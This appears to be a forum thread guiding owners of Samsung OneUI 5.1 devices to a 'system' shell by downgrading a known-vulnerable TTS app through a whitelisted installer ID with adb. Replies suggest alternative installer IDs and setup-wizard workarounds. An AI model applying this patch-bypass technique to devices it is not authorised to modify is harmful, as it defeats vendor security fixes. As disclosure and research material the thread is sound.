[GUIDE] SMT SYSTEM SHELL ACCESS ON SAMSUNG ONEUI 5.1 [March & April Update ]

Search This thread
By:
Advanced…
Camlin3

Camlin3

Senior Member
Jun 28, 2016
634
177

Background:

It all started back in 2019 by @flanker017 who revealed a major bug in Samsung In-House TTS engine Apk which allows a third-party app to call malicious intent to load library as system shared library which can invoke a shell with user system .against which Samsung patched and issued an updated app.

Original CVE: CVE-2019-16253
Original Github Repo of POC: SMT-CVE-2019-16253
Original Write UP: Flanker017 Blog

Present Time in 2023:

Another user @K0mraid3 recently in January leveraged a malfunctioned ADB command which allows downgrading any system app to any version as long as Build SDK supports it to reinstall vulnerable version code: 300200002 against which Samsung issued a patch in OneUI 5.1 March Update to mitigate downgrading of system apps by normal users but again it was limited to selected installers which gives error
Failure [-3005: INSTALL_FAILED_ADP_VERSION_LOCKED]
Click to expand...
Click to collapse


So now , this is something that does not exist in AOSP Code , upon further looking into Samsung Internal Sources , I found out that samsung heavily customises different AOSP APIs according to it's own need so such patch was introduced to mitigate moderately the vulnerability not a concrete solution , it still left some place for itself to rollback system app updates or introducing other updates without any future hassles. that's where comes the another backdoor to introduce downgrading of system apps . Samsung has own Package Installer which goes by package id com.sec.android.preloadinstaller , which invokes system updates and another updates internally of Samsung apps . Samsung was careful or lazy enough to whitelist its own package installer for downgrade of system apps either debuggable or not which also comes under bigger purview of Samsung In-House Security Daemon ASKSMANAGER whitelisted app to perform alleviated restriction free packages installations , and thanks to Android PackageManager , it allows providing installer package id for any app installation.


TLDR; we are going to use a secret installer to downgrade our target app to a vulnerable version on Latest ONEUI 5.1 March/ April Update .
adb install -d -i com.sec.android.preloadinstaller vulnerable_com.samsung.SMT.apk
Click to expand...
Click to collapse
or
adb shell pm install -d -i com.sec.android.preloadinstaller vulnerable_com.samsung.SMT.apk
Click to expand...
Click to collapse

Results:​

scrennshot.png
screencap3.png
screencap4.png


Epilogue:​

Finally Google stepped in as Knight in shining armour for Samsung and put last nail in the coffin for stopping further fun play with May Android Security Update . Now system apps can no longer be downgraded below factory installed version.
More Details : Google Git ; CVE-2023-21116

adiós, amigo !
 
  • Like
Reactions: rifzan, Coldblackice and nguyenlucky
Camlin3

Camlin3

Senior Member
Jun 28, 2016
634
177
Dante63 said:
Using "com.sec.android.preloadinstaller" does not work for samsung watches 1 April 2023... results are yielding downgrade failure
Click to expand...
Click to collapse
What is exact error message with code ?
Are you sure , it's android security update is 1 April 2023 not 1st May 2023 ? Try these installer
Code: 
"com.samsung.android.seinstaller"
"PrePackageInstaller"
 
Dante63

Dante63

Senior Member
Nov 1, 2015
4,111
4,367
30
the Clouds
Samsung Galaxy Note 20 Ultra
Samsung Galaxy Watch 3
Camlin3 said:
What is exact error message with code ?
Are you sure , it's android security update is 1 April 2023 not 1st May 2023 ? Try these installer
Code: 
"com.samsung.android.seinstaller"
"PrePackageInstaller"
Click to expand...
Click to collapse
Absolutely sure, nothing visible in logs as the app used belongs @BLuFeNiX, mine is a tweaked version to work on the watch, for April patch, the smt and the preloadinstaller both give downgrade failure...

I will try the other two and see...
But it might be the watch gotten its update and patched before the phone 🤔...

Will keep you updated...
Screenshot_20230514_134815_settings.png
 
Last edited:
Camlin3

Camlin3

Senior Member
Jun 28, 2016
634
177
Dante63 said:
Absolutely sure, nothing visible in logs as the app used belongs @BLuFeNiX, mine is a tweaked version to work on the watch, for April patch, the smt and the preloadinstaller both give download failure...

I will try the other two and see...
But it might be the watch gotten its update and patched before the phone 🤔...

Will keep you updated...
View attachment 5910269
Click to expand...
Click to collapse
Dante63 said:
Neither of those work, so I am assuming watch April 2023 security patch has it fixed...
Click to expand...
Click to collapse
What is error code ?
 
N

nguyenlucky

Senior Member
Jan 30, 2013
530
194
danang
Hi @wr3cckl3ss1, thank you for your work. I got system shell on my S23U S918B on april update.

Do you know what command I can use to enable the second physical sim slot on my device? It's an Australian version with only one physical SIM slot.

Changing CSC and factory reset makes it recognize the second physical SIM until I finish the setup wizard, where it got disabled again. Hence it must be a software thing.

It has 2 distinct IMEIs and supports DSDS with a physical SIM and eSIM.
 
wr3cckl3ss1

wr3cckl3ss1

Senior Member
Mar 28, 2021
553
396
Houston, TX
Samsung Galaxy Tab S7 FE
Samsung Galaxy Watch 4
nguyenlucky said:
Hi @wr3cckl3ss1, thank you for your work. I got system shell on my S23U S918B on april update.

Do you know what command I can use to enable the second physical sim slot on my device? It's an Australian version with only one physical SIM slot.

Changing CSC and factory reset makes it recognize the second physical SIM until I finish the setup wizard, where it got disabled again. Hence it must be a software thing.

It has 2 distinct IMEIs and supports DSDS with a physical SIM and eSIM.
Click to expand...
Click to collapse
To my knowledge there is not a command to do this. But if your saying it happens right after finishing the setup wizard. Don't finish it or at least get close as possible to almost finishing. Get shell or system shell thru PC and disable or uninstall the package for set-up wizard. Reboot and see if you can see the second sim like you want.
 
N

nguyenlucky

Senior Member
Jan 30, 2013
530
194
danang
wr3cckl3ss1 said:
To my knowledge there is not a command to do this. But if your saying it happens right after finishing the setup wizard. Don't finish it or at least get close as possible to almost finishing. Get shell or system shell thru PC and disable or uninstall the package for set-up wizard. Reboot and see if you can see the second sim like you want.
Click to expand...
Click to collapse
How can I enable adb during the setup wizard?
 
You must log in or register to reply here.

Similar threads

S
[GUIDE] [HOW-TO] Install Adobe Flash Player on Android 4.1 Jelly Bean/ Android 4.4
Replies
1K
Views
3M
farg0o0o
farg0o0o
v7
  • Poll
✭[GUIDE][26-07-2016]Extreme Battery Life Thread(Greenify+Amplify+Power Nap)✭
Replies
14K
Views
2M
varunpilankar
varunpilankar
brandall
[TUT] The Ultimate Noob/Beginners Guide to Tasker
Replies
8K
Views
2M
Samnang110
Samnang110
straycat
Android3D UI - TSF Shell Pro
Replies
4K
Views
593K
M
mb523
DroidModder
[GUIDE] How to edit build.prop on any Android device!
Replies
260
Views
790K
D
diabolyk34

Top Liked Posts

24 Hours All time
  • There are no posts matching your filters.
  • 4
    wr3cckl3ss1
    wr3cckl3ss1
    Camlin3 said:

    BLuFeNiX , See and Update your tool !​

    Click to expand...
    Click to collapse
    Already did it...and since you made the post available now. I'll be forking soon and uploading my version of this...ENJOY the Video
    View
    3
    Camlin3
    Camlin3

    Background:

    It all started back in 2019 by @flanker017 who revealed a major bug in Samsung In-House TTS engine Apk which allows a third-party app to call malicious intent to load library as system shared library which can invoke a shell with user system .against which Samsung patched and issued an updated app.

    Original CVE: CVE-2019-16253
    Original Github Repo of POC: SMT-CVE-2019-16253
    Original Write UP: Flanker017 Blog

    Present Time in 2023:

    Another user @K0mraid3 recently in January leveraged a malfunctioned ADB command which allows downgrading any system app to any version as long as Build SDK supports it to reinstall vulnerable version code: 300200002 against which Samsung issued a patch in OneUI 5.1 March Update to mitigate downgrading of system apps by normal users but again it was limited to selected installers which gives error
    Failure [-3005: INSTALL_FAILED_ADP_VERSION_LOCKED]
    Click to expand...
    Click to collapse


    So now , this is something that does not exist in AOSP Code , upon further looking into Samsung Internal Sources , I found out that samsung heavily customises different AOSP APIs according to it's own need so such patch was introduced to mitigate moderately the vulnerability not a concrete solution , it still left some place for itself to rollback system app updates or introducing other updates without any future hassles. that's where comes the another backdoor to introduce downgrading of system apps . Samsung has own Package Installer which goes by package id com.sec.android.preloadinstaller , which invokes system updates and another updates internally of Samsung apps . Samsung was careful or lazy enough to whitelist its own package installer for downgrade of system apps either debuggable or not which also comes under bigger purview of Samsung In-House Security Daemon ASKSMANAGER whitelisted app to perform alleviated restriction free packages installations , and thanks to Android PackageManager , it allows providing installer package id for any app installation.


    TLDR; we are going to use a secret installer to downgrade our target app to a vulnerable version on Latest ONEUI 5.1 March/ April Update .
    adb install -d -i com.sec.android.preloadinstaller vulnerable_com.samsung.SMT.apk
    Click to expand...
    Click to collapse
    or
    adb shell pm install -d -i com.sec.android.preloadinstaller vulnerable_com.samsung.SMT.apk
    Click to expand...
    Click to collapse

    Results:​

    scrennshot.png
    screencap3.png
    screencap4.png


    Epilogue:​

    Finally Google stepped in as Knight in shining armour for Samsung and put last nail in the coffin for stopping further fun play with May Android Security Update . Now system apps can no longer be downgraded below factory installed version.
    More Details : Google Git ; CVE-2023-21116

    adiós, amigo !
    View
    3
    wr3cckl3ss1
    wr3cckl3ss1

    GitHub - wr3cckl3ss1/system3: system3, Samsung system shell for a 3rd time!

    system3, Samsung system shell for a 3rd time...
    github.com github.com
    View
    2
    Camlin3
    Camlin3

    BLuFeNiX , See and Update your tool !​

    View
    2
    wr3cckl3ss1
    wr3cckl3ss1
    View

New posts